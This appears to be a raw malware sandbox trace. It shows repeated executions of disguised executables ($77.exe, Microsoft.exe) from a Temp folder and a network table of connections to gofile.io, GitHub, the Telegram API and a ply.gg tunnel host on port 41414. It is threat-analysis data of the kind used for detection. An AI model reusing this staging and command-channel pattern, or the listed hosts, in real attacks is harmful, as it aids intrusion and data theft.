"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\ProgramData\$77
C:\ProgramData\$77
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5004 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\ProgramData\$77
C:\ProgramData\$77
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\ProgramData\$77
C:\ProgramData\$77
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\ProgramData\$77
C:\ProgramData\$77
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
C:\Users\Admin\AppData\Local\Temp\$77.exe
"C:\Users\Admin\AppData\Local\Temp\$77.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gofile.io | udp |
| FR | 51.178.66.33:443 | gofile.io | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.66.178.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | s.gofile.io | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| US | 8.8.8.8:53 | 83.29.80.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store1.gofile.io | udp |
| US | 8.8.8.8:53 | 210.242.75.51.in-addr.arpa | udp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| US | 8.8.8.8:53 | 227.123.112.45.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | authority-amazon.gl.at.ply.gg | udp |
| US | 147.185.221.18:41414 | authority-amazon.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 18.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 147.185.221.18:41414 | authority-amazon.gl.at.ply.gg | tcp |
| US | 147.185.221.18:41414 | authority-amazon.gl.at.ply.gg | tcp |
| US | 147.185.221.18:41414 | authority-amazon.gl.at.ply.gg | tcp |
| US | 147.185.221.18:41414 | authority-amazon.gl.at.ply.gg | tcp |
| US | 147.185.221.18:41414 | authority-amazon.gl.at.ply.gg | tcp |
| US | 147.185.221.18:41414 | authority-amazon.gl.at.ply.gg | tcp |
| US | 147.185.221.18:41414 | authority-amazon.gl.at.ply.gg | tcp |
